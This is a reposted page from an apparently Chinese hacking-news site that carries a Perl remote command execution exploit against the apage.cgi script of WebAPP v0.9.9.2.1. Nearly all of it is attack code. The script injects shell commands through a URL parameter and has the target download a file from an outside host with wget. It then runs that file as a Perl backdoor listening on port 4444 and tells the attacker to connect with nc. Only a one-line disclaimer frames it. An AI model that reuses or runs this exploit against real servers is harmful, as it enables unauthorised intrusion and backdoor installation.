安全黑客
当前位置:安全黑客文章资讯安全漏洞最新漏洞
日期:2012-09-22 01:38:00  来源:本站整理

WebAPP v0.9.9.2.1 Remote Command Execution Exploit (1st)[最新漏洞]

赞助商链接



  本文“WebAPP v0.9.9.2.1 Remote Command Execution Exploit (1st)[最新漏洞]”是由安全黑客为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

 测试办法:

本站供应程序(办法)大概带有攻击性,仅供安全研究与讲授之用,风险自负! 
1.!/usr/bin/perl2.#################################################################3.#                         T r a p - S e t   U n d e r G r o u n D   H a c k i n g   T e a m                               #4.#################################################################5.# Remote C0mmand Executing Expl0it - For WebAPP CGI6.#7.#Exploit By :  A l p h a _ P r o g r a m m e r ( Sirus-v );8.#E-Mail : Alpha_Programmer@Yahoo.com9.#            Trapset_Sec@Yahoo.Ca10.#This xpl Open a Backdoor in 4444 Port with Nobody Access !!! All Of The *NIX OS that Have UnPatch11.#apage.cgi is Vulnerable in this M0ment !!12.#13.#################################################################14.#  Gr33tz To ==>  AlphaST.Com , Crouz.Com  , Simorgh-ev.Com  And  MH_P0rtal , Oil_Krachack     #15.#################################################################16.use IO::Socket;17. 18.if (@ARGV < 2)19.{20. print "\n==============================================\n";21. print " \n    WebAPP CGI Exploit By Alpha_Programmer \n\n";22. print "      Trap-Set Underground Hacking Team      \n\n";23. print "            Usage: <T4rg3t> <Dir>      \n\n";24. print "==============================================\n\n";25. print "Examples:\n\n";26. print "    WebApp.pl www.Host.com /cgi-bin/ \n";27. exit();28.}29. 30. 31.$serv = $ARGV[0];32.$serv =~ s/http:\/\///ge;33. 34.$dir = $ARGV[1];35. 36.$cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt";37. 38.$cmde =~ s/ /"\$IFS"/ge;39. 40.$req  = "GET http://$serv";41.$req .= "$dir";42.$req .= "apage.cgi?f=file.htm.|echo\$IFS\"_N_\";$cmde;echo\$IFS\"_T_\"| HTTP/1.0\n\n";43. 44.$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>80) or die " (-) - C4n't C0nn3ct To The S3rver\n";45. 46.print $sock $req;47.print "\nPlease Wait ...\n\n";48.sleep(3000);49.close($sock);50. 51.$sock2 = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>80) or die " (-) - C4n't C0nn3ct To The S3rver\n";52. 53. 54.$cmde2 = "cd /tmp;cp alpha.txt alpha.pl;chmod 777 sirus.pl;perl sirus.pl";55. 56.$cmde2 =~ s/ /"\$IFS"/ge;57. 58.$req2  = "GET http://$serv";59.$req2 .= "$dir";60.$req2 .= "apage.cgi?f=file.htm.|echo\$IFS\"_N_\";$cmde2;echo\$IFS\"_T_\"| HTTP/1.0\n\n";61. 62.print $sock2 $req2;63.print "\n\n$$$   OK -- Now Try: Nc -v www.host.com 4444   $$$\n";64.print "$$  if This Port was Close , This mean is That , You Hav'nt Permission to Write in /TMP  $$\n";65. 66.### EOF ###67. 68. 69.# milw0rm.com&
  以上是“WebAPP v0.9.9.2.1 Remote Command Execution Exploit (1st)[最新漏洞]”的内容,如果你对以上该文章内容感兴趣,你可以看看安全黑客为您推荐以下文章:
  • 惠普LoadRunner的的micWebAjax.dll ActiveX控制NotifyEvent远程执行代码漏洞
  • HP OpenView NNM的webappmon.exe参数远程代码执行漏洞
  • 惠普OpenView NNM的webappmon.exe execvp_nc远程代码执行漏洞
  • 的Novell GroupWise WebAccess中存在多个跨站脚本漏洞
  • WebAPP v0.9.9.2.1 Remote Command Execution Exploit (1st)
  • 利用Webalizer解析Nginx 拜候日记
  • 本文地址: 与您的QQ/BBS好友分享!
    • 好的评价 如果您觉得此文章好,就请您
        100%(3)
    • 差的评价 如果您觉得此文章差,就请您
        0%(0)

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    Copyright © 2012-2013 www.110hack.com. All Rights Reserved .